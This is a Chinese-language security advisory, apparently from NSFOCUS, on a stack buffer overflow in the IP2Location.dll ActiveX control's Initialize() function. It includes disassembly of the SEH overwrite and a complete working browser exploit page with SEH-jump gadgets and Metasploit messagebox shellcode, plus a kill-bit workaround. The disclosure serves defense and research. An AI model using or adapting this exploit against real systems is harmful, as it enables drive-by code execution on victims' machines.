安全研究
安全漏洞
IP2Location.dll Initialize()函数栈溢出漏洞
发布日期:2010-05-31
更新日期:2010-06-01
受影响系统:
Hexasoft Development Sdn. Bhd. IP2Location 1.0.0.1描述:
IP2Location是地理IP解决方案,可帮助识别访客的地理位置。
IP2Location.dll的Initialize()函数中存在栈溢出漏洞,在执行以下指令时向regcode参数提供了超长字符串就可以触发这个溢出:
038D1336 |. 50 |PUSH EAX ; User input
038D1337 |. 53 |PUSH EBX ; Destination address
038D1338 |. E8 D3420000 |CALL IP2Locat.038D5610
在IP2Locat.038D5610中会执行以下例程,将用户输入拷贝到EDI,最终覆盖SEH链。测试显示大约需要1912字节才可覆盖SEH链,但可能因环境而异。
038D56A9 |> 8917 /MOV DWORD PTR DS:[EDI],EDX ; EDI = Destination; we own EDX
038D56AB |. 83C7 04 |ADD EDI,4
038D56AE |> BA FFFEFE7E MOV EDX,7EFEFEFF
038D56B3 |. 8B01 |MOV EAX,DWORD PTR DS:[ECX]
038D56B5 |. 03D0 |ADD EDX,EAX
038D56B7 |. 83F0 FF |XOR EAX,FFFFFFFF
038D56BA |. 33C2 |XOR EAX,EDX
038D56BC |. 8B11 |MOV EDX,DWORD PTR DS:[ECX]
038D56BE |. 83C1 04 |ADD ECX,4
038D56C1 |. A9 00010181 |TEST EAX,81010100
038D56C6 |.^74 E1 |JE SHORT IP2Locat.038D56A9
在程序尝试以下操作之前不会出现访问破坏:
038D12FC |. B8 041F9E03 MOV EAX,IP2Locat.039E1F04 ; ASCII "OK"
038D1301 |> 8B4D 6C MOV ECX,DWORD PTR SS:[EBP+6C] ; [EBP+6C] = 41414141
038D1304 |. C641 24 00 MOV BYTE PTR DS:[ECX+24],0 ; Access violation (we have control of ECX)
Exception: "Access violation when writing to [41414165]" at MOV BYTE PTR DS:[ECX+24],0
这时攻击允许攻击者执行任意代码或导致拒绝服务。
<*来源:sinn3r (x90.sinner@gmail.com)
链接:http://www.corelan.be:8800/wp-content/forum-file-uploads/sinn3r/ip2location_advisory_final.txt
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<head>
<title>IP2Location.dll v1.0.0.1 Initialize() Buffer Overflow by sinn3r</title>
</head>
<body>
<object classid='clsid:A3C8BFFA-1496-4188-A2BC-355A0B3DA0A7' id='ip2location'></object>
<script language="JavaScript">
/*
IP2Location.dll v1.0.0.1 Initialize() Buffer Overflow
Vulnerable v1.0.0.1 checksum: d86933ab58720c384bdc081d33684f7d
Patched v1.0.0.1 checksum : bf66e2ef8be3c301b381cfb424ad0afc (v3.0.1.0 is also patched)
Found and coded by sinn3r
http://twitter.com/_sinn3r
1) Script provided 'as is', without any warranty. Use for educational purposes only.
2) Do not use this code to do anything illegal, that's ridiculous!
3) You are not allowed to edit/modify this code. If you do, Corelan Security cannot be
held responsible for any damages this may cause.
*/
// ./msfpayload windows/messagebox exitfunc=thread TEXT="by sinn3r" TITLE="Demo by Corelan"
messagebox = "PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIHYJKMK8Y2T7TZTP1XRNRRZVQ9YSTL"+
"KT1VPLKSFDLLKSFULLKG6THLK3NQ0LK7FP80OUH2UL3V95Q8QKOM1CPLK2LFD6DLKW5GLLK1DUU48C1JJLKQZUHL"+
"K1JWP31ZKKSVWG9LKP4LKEQJNP1KO6Q9PKLNLMTIP2TDJIQXOTMC1HGM9L1KOKOKOGKSLFDQ8RUYNLK0ZVDS1JKU"+
"6LKTLPKLK0ZELUQJKLKUTLK5QM8MYPDVDEL3QO3OB5XQ9YDMYZEK9O2RHLNPNDNZL62KXMLKOKOKOK9QUUTOKZO8"+
"NKPSPLGULWTPRZHLKKOKOKOLIW5THBH2LRL7PKO58VS6RVNU4CXT5T3CUCBK8QL7TUZMYM6PVKOV55TMYHBF0OKO"+
"XY20MOLLG5LFD0RM8QNKOKOKO582LSQ2NPXU8QS2OBRSUE8GPSRSIQ058G42ERMRO6Q9KMXQLWT4OK9JC3X2R68W"+
"P10SX592NRNVSE8U2BY7PRSVQIYMX0LQ439K9KQFQYBQB63PQPRKON06QIPPPKOF5UXEZA";
alignment = unescape(
"%58"+ //POP EAX
"%04%0B" //ADD AL, 0x0B
);
// Tested size = 10260 bytes
var padding1 = unescape("%41"); //Padding
while (padding1.length < 1912)
padding1 += unescape("%41");
var nseh = unescape("%EB%06%42%42"); //Short Jump
var seh = unescape("%71%33%6E%74"); //0x746E3371 msls31.dll IE6
var padding2 = unescape("%41"); //Padding
while (padding2.length < 10000)
padding2 += unescape("%41");
buffer = padding1 + nseh + seh + alignment + messagebox + padding2;
var arg1 = ip2location.Initialize(buffer);
</script>
</body>
</html>
建议:
临时解决方法:
* 为clsid A3C8BFFA-1496-4188-A2BC-355A0B3DA0A7设置kill bit。
厂商补丁:
Hexasoft Development Sdn. Bhd.
------------------------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.ip2location.com/
浏览次数:3687
严重程度:0(网友投票)
绿盟科技给您安全的保障